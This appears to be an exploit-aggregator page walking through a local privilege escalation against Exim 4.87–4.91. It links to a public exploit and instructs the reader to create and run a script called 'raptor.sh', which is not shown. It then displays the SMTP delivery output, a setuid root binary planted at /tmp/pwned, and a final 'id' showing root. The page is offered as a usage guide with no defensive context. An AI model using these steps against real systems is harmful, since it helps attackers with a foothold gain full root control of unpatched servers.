Share
## https://sploitus.com/exploit?id=18246B75-1EEB-576A-922A-7076D0D9C473
Cr.Exim 4.87 - 4.91 - Local Privilege Escalation

Cr.Link: https://www.exploit-db.com/exploits/46996

#1.This method requires you to first access the target machine with standard user privileges.

#2.Once you have accessed the target machine, create a script file with the following content:

vi raptor.sh


#3.Copy the code from the provided 'raptor.sh' file. Then, execute the file using the command:

chmod +x raptor.sh

./raptor.sh


#4.You should receive output similar to the example below:

Preparing setuid shell helper...

Delivering payload...   

220 machine-noob

 ESMTP Exim 4.89 Wed, 03 Dec 2025 08:29:29 +0000   
 
250 machine-noob

 Hello localhost [127.0.0.1]  
 
250 OK        

250 Accepted    

354 Enter message, ending with "." on a line by itself 

250 OK id=1vQiEr-00001R-7t   

221 machine-noob

 closing connection 
 
Waiting 5 seconds for Exim to execute payload... 

-rwsr-xr-x 1 root noob 8392 Dec  3 08:29 /tmp/pwned 


#5.Next, execute the following command:

/tmp/pwned


#6.Then, try running 'id' command. If you see the following result:
                                               
uid=0(root) gid=0(root) groups=0(root),1001(noob)